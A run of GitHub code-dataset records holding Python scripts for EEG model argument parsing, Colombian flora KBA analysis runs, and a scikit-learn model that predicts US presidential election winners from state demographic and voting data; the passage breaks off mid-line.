f.close()\r\n\r\n\r\n","repo_name":"chenzhenpeng18/FSE22-MAAT","sub_path":"Fairea/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"73853763343","text":"import argparse\n\ndef checkParser():\n parser = argparse.ArgumentParser(description=\"Configure the network\")\n parser.add_argument(\"--model\", \"-m\", dest=\"model_type\", type=str, default=\"RNN\", help=\"type of model (RNN, LSTM, GRU)\")\n parser.add_argument(\"--prep\", \"-p\", dest=\"use_prep\", action=\"store_true\", default=False, help=\"use data preperation or not\")\n parser.add_argument(\"--epochs\", \"-e\", dest=\"num_epochs\", type=int, default=50, help=\"number of the epochs\")\n parser.add_argument(\"--dropout\", \"-d\", dest=\"dropout\", type=float, default=0.6, help=\"dropout value\")\n parser.add_argument(\"--subject\", \"-s\", dest=\"use_subject\", action=\"store_true\", default=False, help=\"use single person data\")\n parser.add_argument(\"--window\", \"-w\", dest=\"window\", type=int, default=None, help=\"window size\")\n \n return parser.parse_args()\n\n\nif __name__==\"__main__\":\n args = checkParser()\n print(args.model_type)\n print(args.use_prep)\n","repo_name":"kyswn/Deep-Learning-on-EEG","sub_path":"final project code/RNN and CNN-RNN code/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"14858783823","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Candidate KBA delimitation of Colombian flora\n# \n# ## Locality aggregation experiments\n# \n# These experiments perform several Ackbar analyses using different thresholds to join close occurrences into a single population.\n\n# In[1]:\n\n\nimport subprocess\nfrom shutil import rmtree\nfrom os import walk, mkdir\n\n\n# In[3]:\n\n\nanalysis_folder = \"/home/nelson/Data/kba/colombia/analyses/localities_aggregation/\"\nackbar_bin = \"/home/nelson/Data/kba/ackbar/ackbar.py\"\n\n\n# ### Analysis execution\n\n# In[4]:\n\n\nrmtree(analysis_folder)\nmkdir(analysis_folder)\n\n\n# In[12]:\n\n\nconfig_text = \"\"\"\ndistribution_file = /home/nelson/Data/kba/colombia/amenazadas_ocurrencias.csv\niucn_file = /home/nelson/Data/kba/colombia/amenazadas_categorias.csv\n\ntaxonomic_groups_file = \ntaxonomic_assignments_file = /home/nelson/Data/kba/colombia/amenazadas_grupos.csv\n\nkba_species_file = /home/nelson/Data/kba/colombia/Colombia_IBA_trigger_species.csv\nkba_directory = /home/nelson/Dropbox/Humboldt/Postdoc/KBA_by_IUCN/Colombia_KBA\nkba_index = SitRecID\n\noutfile_root = {0}\noverwrite_output = True\n\ncell_size = {1}\noffset_lat = 0\noffset_lon = 0\n\n#focal_area_directory = \n\npop_max_distance = {2}\n\neps = 0.2\niters = 10000\nmax_kba = 50\ncongruency_factor = 12\"\"\"\n\n\n# In[50]:\n\n\ncesis = [\"0.2\", \"0.5\"]\nlocdists = range(0, 12, 2)\n\n\n# In[13]:\n\n\nfor c in cesis:\n for p in locdists:\n root = \"{0}cell_size_{1}_loc_dist_{2:02.0f}\".format(analysis_folder, c, p)\n #print(root)\n tct = config_text.format(root, c, p)\n config_file = \"{0}cell_size_{1}_loc_dist_{2:02.0f}.txt\".format(analysis_folder, c, p)\n with open(config_file, \"w\") as fh:\n fh.write(tct)\n\n ackbargs = [ackbar_bin, config_file]\n out, err = None, None\n with subprocess.Popen(ackbargs, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as pr:\n out, err = pr.communicate()\n\n if len(err):\n print(err.decode('utf8'))\n\n","repo_name":"nrsalinas/kba_colombia","sub_path":"locality_aggregation.py","file_name":"locality_aggregation.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3093116891","text":"from calculations import Calculations\n\nimport sys\nimport os\nimport pandas as pd\nimport numpy as np\nfrom numpy import array\nfrom numpy import mean\nfrom numpy import std\nfrom numpy.core.umath_tests import inner1d\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import metrics\nimport csv\nimport _pickle\n\nclass Prediction(Calculations):\n \n def __init__(self):\n # get Calculations attributes\n prediction_data_object = Calculations()\n prediction_data_object.get_prediction_data()\n # historical voting data\n self.dem_rep_state_df = prediction_data_object.dem_rep_votes_df\n # education data\n self.overall_education_df = prediction_data_object.overall_education_df\n self.rural_education_df = prediction_data_object.rural_education_df\n self.urban_education_df = prediction_data_object.urban_education_df\n # income data\n self.income_df = prediction_data_object.income_df\n # electoral votes data\n self.electoral_votes_per_state_per_year_dict = prediction_data_object.electoral_votes_dict\n # acronym data\n self.state_acronym_df = prediction_data_object.state_acronym_df\n # probable outcome 538 data\n self.probable_outcomes_538_dict = prediction_data_object.probable_outcomes_538_dict\n # demographic data\n self.demographic_df_1976 = prediction_data_object.demographic_df_1976\n self.demographic_df_1980 = prediction_data_object.demographic_df_1980\n self.demographic_df_1984 = prediction_data_object.demographic_df_1984\n self.demographic_df_1988 = prediction_data_object.demographic_df_1988\n self.demographic_df_1992 = prediction_data_object.demographic_df_1992\n self.demographic_df_1996 = prediction_data_object.demographic_df_1996\n self.demographic_df_2000 = prediction_data_object.demographic_df_2000\n self.demographic_df_2004 = prediction_data_object.demographic_df_2004\n self.demographic_df_2008 = prediction_data_object.demographic_df_2008\n self.demographic_df_2012 = prediction_data_object.demographic_df_2012\n self.demographic_df_2016 = prediction_data_object.demographic_df_2016\n self.demographic_df_2018 = prediction_data_object.demographic_df_2018\n self.senate_votes_df = prediction_data_object.senate_votes_df\n self.house_votes_df = prediction_data_object.house_votes_df\n # uncomment if trying to run models - these datasets are large and take longer to load\n '''\n # prediction df data\n self.all_prediction_df = prediction_data_object.all_prediction_df\n self.final_prediction_df = prediction_data_object.final_prediction_df\n '''\n # prediction results data\n self.prediction_results_df = prediction_data_object.prediction_results_df\n self.pop_data_2020_df = prediction_data_object.pop_data_2020_df\n\n def merge_prediction_data(self):\n dem_rep_df = self.dem_rep_state_df\n votes_df_1976 = dem_rep_df.loc[dem_rep_df['Year'] == 1976]\n votes_df_1980 = dem_rep_df.loc[dem_rep_df['Year'] == 1980]\n votes_df_1984 = dem_rep_df.loc[dem_rep_df['Year'] == 1984]\n votes_df_1988 = dem_rep_df.loc[dem_rep_df['Year'] == 1988]\n votes_df_1992 = dem_rep_df.loc[dem_rep_df['Year'] == 1992]\n votes_df_1996 = dem_rep_df.loc[dem_rep_df['Year'] == 1996]\n votes_df_2000 = dem_rep_df.loc[dem_rep_df['Year'] == 2000]\n votes_df_2004 = dem_rep_df.loc[dem_rep_df['Year'] == 2004]\n votes_df_2008 = dem_rep_df.loc[dem_rep_df['Year'] == 2008]\n votes_df_2012 = dem_rep_df.loc[dem_rep_df['Year'] == 2012]\n votes_df_2016 = dem_rep_df.loc[dem_rep_df['Year'] == 2016]\n\n # create 1976 df\n df_1976 = self.overall_education_df[['Code', 'Overall_Edu_1976']]\n df_1976 = df_1976.merge(self.rural_education_df[['Code', 'Rural_Edu_1976']], on='Code')\n df_1976 = df_1976.merge(self.urban_education_df[['Code', 'Urban_Edu_1976']], on='Code')\n df_1976 = df_1976.merge(self.income_df[['Code', '1976_Median_Income']], on='Code')\n df_1976 = df_1976.merge(self.demographic_df_1976[['Code', 'Age_Group_1976', 'Both_Sexes_1976']], on='Code')\n df_1976['Year'] = 1976\n df_1976 = pd.merge(df_1976, self.senate_votes_df, on=['Code', 'Year'])\n df_1976 = pd.merge(df_1976, self.house_votes_df, on=['Code', 'Year'])\n df_1976 = df_1976.merge(votes_df_1976[['Code', 'Winner']], on='Code')\n df_1976.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 'Population', 'Year', 'Sen_Party', 'Sen_Candidate_Votes',\n 'Sen_Total_Votes', 'House_Party', 'House_Candidate_Votes',\n 'House_Total_Votes', 'Winner']\n df_1976.to_csv('output.csv', index=False)\n # create 1980 df\n df_1980 = self.overall_education_df[['Code', 'Overall_Edu_1980']]\n df_1980 = df_1980.merge(self.rural_education_df[['Code', 'Rural_Edu_1980']], on='Code')\n df_1980 = df_1980.merge(self.urban_education_df[['Code', 'Urban_Edu_1980']], on='Code')\n df_1980 = df_1980.merge(self.income_df[['Code', '1980_Median_Income']], on='Code')\n df_1980 = df_1980.merge(self.demographic_df_1980[['Code', 'Age_Group_1980', \n 'Both_Sexes_1980', 'Male_1980', 'Female_1980']], on='Code')\n df_1980['Year'] = 1980\n df_1980 = pd.merge(df_1980, self.senate_votes_df, on=['Code', 'Year'])\n df_1980 = pd.merge(df_1980, self.house_votes_df, on=['Code', 'Year'])\n df_1980 = df_1980.merge(votes_df_1980[['Code', 'Winner']], on='Code')\n df_1980.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 'Population', 'Male_Population', 'Female_Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1984 df\n df_1984 = self.overall_education_df[['Code', 'Overall_Edu_1984']]\n df_1984 = df_1984.merge(self.rural_education_df[['Code', 'Rural_Edu_1984']], on='Code')\n df_1984 = df_1984.merge(self.urban_education_df[['Code', 'Urban_Edu_1984']], on='Code')\n df_1984 = df_1984.merge(self.income_df[['Code', '1984_Median_Income']], on='Code')\n df_1984 = df_1984.merge(self.demographic_df_1984[['Code', 'Age_Group_1984', \n 'Both_Sexes_1984', 'Male_1984', 'Female_1984']], on='Code')\n df_1984['Year'] = 1984\n df_1984 = pd.merge(df_1984, self.senate_votes_df, on=['Code', 'Year'])\n df_1984 = pd.merge(df_1984, self.house_votes_df, on=['Code', 'Year'])\n df_1984 = df_1984.merge(votes_df_1984[['Code', 'Winner']], on='Code')\n df_1984.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 'Population', 'Male_Population', 'Female_Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1988 df\n df_1988 = self.overall_education_df[['Code', 'Overall_Edu_1988']]\n df_1988 = df_1988.merge(self.rural_education_df[['Code', 'Rural_Edu_1988']], on='Code')\n df_1988 = df_1988.merge(self.urban_education_df[['Code', 'Urban_Edu_1988']], on='Code')\n df_1988 = df_1988.merge(self.income_df[['Code', '1988_Median_Income']], on='Code')\n df_1988 = df_1988.merge(self.demographic_df_1988[['Code', 'Age_Group_1988', \n 'Both_Sexes_1988', 'Male_1988', 'Female_1988']], on='Code')\n df_1988['Year'] = 1988\n df_1988 = pd.merge(df_1988, self.senate_votes_df, on=['Code', 'Year'])\n df_1988 = pd.merge(df_1988, self.house_votes_df, on=['Code', 'Year'])\n df_1988 = df_1988.merge(votes_df_1988[['Code', 'Winner']], on='Code')\n df_1988.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 'Population', 'Male_Population', 'Female_Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1992 df\n df_1992 = self.overall_education_df[['Code', 'Overall_Edu_1992']]\n df_1992 = df_1992.merge(self.rural_education_df[['Code', 'Rural_Edu_1992']], on='Code')\n df_1992 = df_1992.merge(self.urban_education_df[['Code', 'Urban_Edu_1992']], on='Code')\n df_1992 = df_1992.merge(self.income_df[['Code', '1992_Median_Income']], on='Code')\n df_1992 = df_1992.merge(self.demographic_df_1992[['Code', 'Age_Group_1992', \n 'Race_Sex_1992', 'Ethnic_Origin_1992', 'Population_1992']], on='Code')\n df_1992['Year'] = 1992\n df_1992 = pd.merge(df_1992, self.senate_votes_df, on=['Code', 'Year'])\n df_1992 = pd.merge(df_1992, self.house_votes_df, on=['Code', 'Year'])\n df_1992 = df_1992.merge(votes_df_1992[['Code', 'Winner']], on='Code')\n df_1992.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Race_Sex', 'Ethnic_Origin', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1996 df\n df_1996 = self.overall_education_df[['Code', 'Overall_Edu_1996']]\n df_1996 = df_1996.merge(self.rural_education_df[['Code', 'Rural_Edu_1996']], on='Code')\n df_1996 = df_1996.merge(self.urban_education_df[['Code', 'Urban_Edu_1996']], on='Code')\n df_1996 = df_1996.merge(self.income_df[['Code', '1996_Median_Income']], on='Code')\n df_1996 = df_1996.merge(self.demographic_df_1996[['Code', 'Age_Group_1996',\n 'Race_Sex_1996', 'Ethnic_Origin_1996', 'Population_1996']], on='Code')\n df_1996['Year'] = 1996\n df_1996 = pd.merge(df_1996, self.senate_votes_df, on=['Code', 'Year'])\n df_1996 = pd.merge(df_1996, self.house_votes_df, on=['Code', 'Year'])\n df_1996 = df_1996.merge(votes_df_1996[['Code', 'Winner']], on='Code')\n df_1996.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Race_Sex', 'Ethnic_Origin', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2000 df\n df_2000 = self.overall_education_df[['Code', 'Overall_Edu_2000']]\n df_2000 = df_2000.merge(self.rural_education_df[['Code', 'Rural_Edu_2000']], on='Code')\n df_2000 = df_2000.merge(self.urban_education_df[['Code', 'Urban_Edu_2000']], on='Code')\n df_2000 = df_2000.merge(self.income_df[['Code', '2000_Median_Income']], on='Code')\n df_2000 = df_2000.merge(self.demographic_df_2000[['Code', 'Age_Group_2000', \n 'SEX_2000', 'POPESTIMATE2000']], on='Code')\n df_2000['Year'] = 2000\n df_2000 = pd.merge(df_2000, self.senate_votes_df, on=['Code', 'Year'])\n df_2000 = pd.merge(df_2000, self.house_votes_df, on=['Code', 'Year'])\n df_2000 = df_2000.merge(votes_df_2000[['Code', 'Winner']], on='Code')\n df_2000.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Population', 'Year', 'Sen_Party',\n 'Sen_Candidate_Votes', 'Sen_Total_Votes', 'House_Party', \n 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2004 df\n df_2004 = self.overall_education_df[['Code', 'Overall_Edu_2004']]\n df_2004 = df_2004.merge(self.rural_education_df[['Code', 'Rural_Edu_2004']], on='Code')\n df_2004 = df_2004.merge(self.urban_education_df[['Code', 'Urban_Edu_2004']], on='Code')\n df_2004 = df_2004.merge(self.income_df[['Code', '2004_Median_Income']], on='Code')\n df_2004 = df_2004.merge(self.demographic_df_2004[['Code', 'Age_Group_2004', \n 'SEX_2004', 'POPESTIMATE2004']], on='Code')\n df_2004['Year'] = 2004\n df_2004 = pd.merge(df_2004, self.senate_votes_df, on=['Code', 'Year'])\n df_2004 = pd.merge(df_2004, self.house_votes_df, on=['Code', 'Year'])\n df_2004 = df_2004.merge(votes_df_2004[['Code', 'Winner']], on='Code')\n df_2004.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Population', 'Year', 'Sen_Party',\n 'Sen_Candidate_Votes', 'Sen_Total_Votes', 'House_Party',\n 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2008 df\n df_2008 = self.overall_education_df[['Code', 'Overall_Edu_2008']]\n df_2008 = df_2008.merge(self.rural_education_df[['Code', 'Rural_Edu_2008']], on='Code')\n df_2008 = df_2008.merge(self.urban_education_df[['Code', 'Urban_Edu_2008']], on='Code')\n df_2008 = df_2008.merge(self.income_df[['Code', '2008_Median_Income']], on='Code')\n df_2008 = df_2008.merge(self.demographic_df_2008[['Code', 'Age_Group_2008', \n 'SEX_2008', 'POPESTIMATE2008']], on='Code')\n df_2008['Year'] = 2008\n df_2008 = pd.merge(df_2008, self.senate_votes_df, on=['Code', 'Year'])\n df_2008 = pd.merge(df_2008, self.house_votes_df, on=['Code', 'Year'])\n df_2008 = df_2008.merge(votes_df_2008[['Code', 'Winner']], on='Code')\n df_2008.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Population', 'Year', 'Sen_Party',\n 'Sen_Candidate_Votes', 'Sen_Total_Votes', 'House_Party',\n 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2012 df\n df_2012 = self.overall_education_df[['Code', 'Overall_Edu_2012']]\n df_2012 = df_2012.merge(self.rural_education_df[['Code', 'Rural_Edu_2012']], on='Code')\n df_2012 = df_2012.merge(self.urban_education_df[['Code', 'Urban_Edu_2012']], on='Code')\n df_2012 = df_2012.merge(self.income_df[['Code', '2012_Median_Income']], on='Code')\n os.path.join(sys.path[0], 'Datasets', 'college_complete_rural_urban_data', 'overall_college_complete_state.csv')\n df_2012 = df_2012.merge(self.demographic_df_2012[['Code', 'Age_Group_2012', \n 'SEX_2012', 'ORIGIN_2012', 'RACE_2012', 'POPESTIMATE2012']], on='Code')\n df_2012['Year'] = 2012\n df_2012 = pd.merge(df_2012, self.senate_votes_df, on=['Code', 'Year'])\n df_2012 = pd.merge(df_2012, self.house_votes_df, on=['Code', 'Year'])\n df_2012 = df_2012.merge(votes_df_2012[['Code', 'Winner']], on='Code')\n df_2012.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Ethnic_Origin', 'Race', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2016 df\n df_2016 = self.overall_education_df[['Code', 'Overall_Edu_2016']]\n df_2016 = df_2016.merge(self.rural_education_df[['Code', 'Rural_Edu_2016']], on='Code')\n df_2016 = df_2016.merge(self.urban_education_df[['Code', 'Urban_Edu_2016']], on='Code')\n df_2016 = df_2016.merge(self.income_df[['Code', '2016_Median_Income']], on='Code')\n os.path.join(sys.path[0], 'Datasets', 'college_complete_rural_urban_data', 'overall_college_complete_state.csv')\n df_2016 = df_2016.merge(self.demographic_df_2016[['Code', 'Age_Group_2016', \n 'SEX_2016', 'ORIGIN_2016', 'RACE_2016', 'POPESTIMATE2016']], on='Code')\n df_2016['Year'] = 2016\n df_2016 = pd.merge(df_2016, self.senate_votes_df, on=['Code', 'Year'])\n df_2016 = pd.merge(df_2016, self.house_votes_df, on=['Code', 'Year'])\n df_2016 = df_2016.merge(votes_df_2016[['Code', 'Winner']], on='Code')\n df_2016.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Ethnic_Origin', 'Race', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2018 df\n df_2018 = self.overall_education_df[['Code', 'Overall_Edu_2018']]\n df_2018 = df_2018.merge(self.rural_education_df[['Code', 'Rural_Edu_2018']], on='Code')\n df_2018 = df_2018.merge(self.urban_education_df[['Code', 'Urban_Edu_2018']], on='Code')\n df_2018 = df_2018.merge(self.income_df[['Code', '2018_Median_Income']], on='Code')\n os.path.join(sys.path[0], 'Datasets', 'college_complete_rural_urban_data', 'overall_college_complete_state.csv')\n df_2018 = df_2018.merge(self.demographic_df_2018[['Code', 'Age_Group_2018', \n 'SEX_2018', 'ORIGIN_2018', 'RACE_2018', 'POPESTIMATE2018']], on='Code')\n df_2018['Year'] = 2018\n df_2018 = pd.merge(df_2018, self.senate_votes_df, on=['Code', 'Year'])\n df_2018 = pd.merge(df_2018, self.house_votes_df, on=['Code', 'Year'])\n df_2018.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Ethnic_Origin', 'Race', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes']\n \n print('finished all df individually, now merging...')\n # concatenate all prediction data\n final_df = pd.concat([df_1976, df_1980, df_1984, df_1988, df_1992, df_1996, df_2000,\n df_2004, df_2008, df_2012, df_2016, df_2018], axis=0, ignore_index=True)\n final_df.to_csv('all_prediction_data.csv', index=False)\n\n def impute_missing_data(self):\n # create prediction df\n prediction_df = self.all_prediction_df\n prediction_df = prediction_df[prediction_df.Sex != 0]\n prediction_df = prediction_df[prediction_df.Ethnic_Origin != 0]\n\n # average male/female breakdown to extrapolate data fields\n average_male_percent = .492\n average_female_percent = 1 - average_male_percent\n\n # fill NaN values with U and assign national averages to each row\n new_df = prediction_df.assign(Male_Population=prediction_df['Male_Population'].fillna('U'))\n new_df = new_df.assign(Female_Population=new_df['Female_Population'].fillna('U'))\n\n new_df = new_df.assign(\n Male_Population=new_df.apply(\n lambda row: int(round(float(row.Population)*average_male_percent, 0))\n if row.Male_Population == 'U' else row.Male_Population, axis=1))\n new_df = new_df.assign(\n Female_Population=new_df.apply(\n lambda row: int(round(float(row.Population)*average_female_percent, 0))\n if row.Female_Population == 'U' else row.Female_Population, axis=1))\n\n # get mode for each categorical feature\n race_sex_mode = new_df['Race_Sex'].mode()\n ethnic_origin_mode = new_df['Ethnic_Origin'].mode()\n sex_mode = new_df['Sex'].mode()\n race_mode = new_df['Race'].mode()\n\n # convert NaN values into mode\n new_df = new_df.assign(Race_Sex=new_df['Race_Sex'].fillna(race_sex_mode[0]))\n new_df = new_df.assign(Ethnic_Origin=new_df['Ethnic_Origin'].fillna(ethnic_origin_mode[0]))\n new_df = new_df.assign(Sex=new_df['Sex'].fillna(sex_mode[0]))\n new_df = new_df.assign(Race=new_df['Race'].fillna(race_mode[0]))\n del new_df['Year']\n\n # write final df to csv\n new_df.to_csv('final_cleaned_prediction_data_9_30.csv', index=False)\n \n def compare_multiple_models(self):\n ### 0 == Dem (BLUE), 1 == Rep (RED)\n print('running models on dataset...')\n # import cleaned and imputed df, perform final conversions\n df = self.final_prediction_df\n # create dfs for running model\n final_df_data = df[df['Winner'].notnull()]\n prediction_df_2020 = df[df['Winner'].isnull()]\n\n ### test model by removing certain years from training set\n #final_df_data = final_df_data[final_df_data.Year != 1976]\n #final_df_data = final_df_data[final_df_data.Year != 1980]\n #final_df_data = final_df_data[final_df_data.Year != 1984]\n #final_df_data = final_df_data[final_df_data.Year != 1988]\n #final_df_data = final_df_data[final_df_data.Year != 1992]\n #final_df_data = final_df_data[final_df_data.Year != 1996]\n #final_df_data = final_df_data[final_df_data.Year != 2000]\n #final_df_data = final_df_data[final_df_data.Year != 2004]\n #final_df_data = final_df_data[final_df_data.Year != 2008]\n #final_df_data = final_df_data[final_df_data.Year != 2012]\n final_df_answer = final_df_data['Winner']\n\n # create dictionary of all individual year data\n years = [1976, 1980, 1984, 1988, 1992, 1996,\n 2000, 2004, 2008, 2012, 2016, 2020]\n test_dict = {}\n training_dict = {}\n for year in years:\n if year != 2020:\n test_dict[year] = final_df_data.loc[final_df_data['Year'] == year]\n else:\n test_dict[year] = prediction_df_2020\n training_dict[year] = final_df_data.loc[final_df_data['Year'] != year]\n del final_df_data['Winner']\n del final_df_data['Year']\n\n # separate df into training and test data\n x_train, x_test, y_train, self.y_test = train_test_split(final_df_data, final_df_answer, test_size=0.3, random_state=0)\n #x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.25, random_state=0) # 0.25 x 0.8 = 0.2\n \n # instantiate models\n lr = LogisticRegression()\n rf = RandomForestClassifier(max_depth=7, random_state=13)\n svc = make_pipeline(StandardScaler(),\n LinearSVC(random_state=13,\n tol=1e-5,\n loss='squared_hinge',\n max_iter=100,\n fit_intercept=False))\n #class_weight='balanced'))\n sgd = SGDClassifier(max_iter=1000, tol=1e-3)\n knn = KNeighborsClassifier(n_neighbors=3)\n bayes = GaussianNB()\n\n # create varibles for looping through models and outputting results\n models = [lr, rf, svc, sgd, knn, bayes]\n columns = ['Year', 'Logistic Regression', 'Random Forest', 'Support Vector Classification',\n 'Stochastic Gradient Descent', 'K-Nearest Neighbors', 'Naive Bayes']\n model_names = columns[1:]\n filename = 'Election_Accuracy_9_30.csv'\n counter = 0\n\n # create results output file\n with open(filename, 'w') as csvfile: \n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(columns)\n \n years = [2008, 2012, 2016]\n # iterate through each individual model for each year\n for year in years:\n score_list = []\n score_list.append(year)\n y_train = training_dict[year]['Winner']\n del training_dict[year]['Winner']\n x_train = training_dict[year]\n y_test = test_dict[year]['Winner']\n del test_dict[year]['Winner']\n x_test = test_dict[year]\n\n for i, model in enumerate(models):\n model.fit(x_train, y_train)\n if year == 2020:\n predictions = model.predict(x_test)\n predictions_2020 = model.predict(x_test)\n pd.options.mode.chained_assignment = None\n prediction_df_2020['Winner'] = predictions_2020\n prediction_df_2020.to_csv('predictions.csv', index=False)\n counter += 1\n # Save model\n #with open('churn_classifier_{}_{}.pkl'.format(model, counter), 'wb') as fid:\n # _pickle.dump(model, fid)\n #print('done fitting {} model'.format(model_names[i]))\n if year != 2020:\n score = model.score(x_test, y_test)\n score_list.append(round(score, 4))\n print('{}, {} performance: {}'.format(year, model_names[i], round(score, 4)))\n \n if year != 2020:\n # write to results output file\n with open(filename, 'a') as csvfile: \n csvwriter = csv.writer(csvfile) \n csvwriter.writerow(score_list)\n\n def run_best_model(self):\n print('running optimal model on dataset...')\n # import cleaned and imputed df, perform final conversions\n df = self.final_prediction_df\n # create dfs for running model\n final_df_data = df[df['Winner'].notnull()]\n prediction_df_2020 = df[df['Winner'].isnull()]\n del prediction_df_2020['Winner']\n del prediction_df_2020['Year']\n final_df_answer = final_df_data['Winner']\n del final_df_data['Winner']\n del final_df_data['Year']\n\n # separate df into training and test data\n x_train, x_test, y_train, self.y_test = train_test_split(final_df_data, final_df_answer, test_size=0.3, random_state=0)\n\n # instantiate model\n rf = RandomForestClassifier(max_depth=9, random_state=13)\n \n # fit model to training data, calculate score of test data, and predict 2020 election\n rf.fit(x_train, y_train)\n self.predictions = rf.predict(x_test)\n self.score = rf.score(x_test, self.y_test)\n print(self.score)\n predictions_2020 = rf.predict(prediction_df_2020)\n pd.options.mode.chained_assignment = None\n prediction_df_2020['Winner'] = predictions_2020\n prediction_df_2020.to_csv('predictions.csv', index=False)\n\n def plot_confusion_matrix(self):\n print('plotting confusion matrix...')\n # make seaborn confusion matrix\n cm = metrics.confusion_matrix(self.y_test, self.predictions)\n plt.figure(figsize=(9,9))\n sns.heatmap(cm, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\n plt.ylabel('Actual label')\n plt.xlabel('Predicted label')\n all_sample_title = 'Accuracy Score: {0}'.format(self.score)\n plt.title(all_sample_title, size = 15)\n plt.show()\n\n def compute_results(self):\n # import prediction results and manipulate df\n df_results = self.prediction_results_df\n winner_series_2 = df_results.groupby(['Code', 'Winner'])['Population'].sum()\n df_2 = winner_series_2.to_frame().reset_index()\n df_2.sort_values('Population', inplace=True)\n df_2.drop_duplicates(subset='Code', keep='last',inplace=True)\n df_2.sort_values('Code', inplace=True)\n df_2 = df_2.replace(1.0, 'RED')\n df_2 = df_2.replace(0.0, 'BLUE')\n # import overall 2020 population for percent win calculations\n pop_df = self.pop_data_2020_df\n pop_df = pop_df.groupby(['Code'])['Population'].sum().reset_index()\n\n # import datasets to align with results\n electoral_votes_per_state_per_year_dict = self.electoral_votes_per_state_per_year_dict\n df_3 = self.state_acronym_df\n\n # add up electoral votes for biden/trump and print winner results\n biden_counter = 0\n trump_counter = 0\n predicted_blue_states = []\n predicted_red_states = []\n winner_dict_2020 = {}\n percent_dict_2020 = {}\n all_blue_votes = 0\n all_red_votes = 0\n dem_states_won = 0\n rep_states_won = 0\n # iterate through df and populate dicts for plotting\n for i, row in enumerate(df_2.values):\n if row[1].strip() == 'BLUE':\n predicted_blue_states.append(df_3['State'][i])\n winner_dict_2020[df_3['Acronym'][i]] = row[1].strip()\n percent_dict_2020[df_3['Acronym'][i]] = round(\n (row[-1]/pop_df['Population'].iloc[i])*100-50,5)\n all_blue_votes += int(row[-1])\n biden_counter += electoral_votes_per_state_per_year_dict[2016][i]\n dem_states_won += 1\n elif row[1].strip() == 'RED':\n predicted_red_states.append(df_3['State'][i])\n winner_dict_2020[df_3['Acronym'][i]] = row[1].strip()\n percent_dict_2020[df_3['Acronym'][i]] = round(\n (row[-1]/pop_df['Population'].iloc[i])*100-50,5)\n all_red_votes += int(row[-1])\n trump_counter += electoral_votes_per_state_per_year_dict[2016][i]\n rep_states_won += 1\n\n # extrapolated voting population to calculate number of voters for each candidate\n voting_population_2020 = 129838306\n blue_vote_percent = 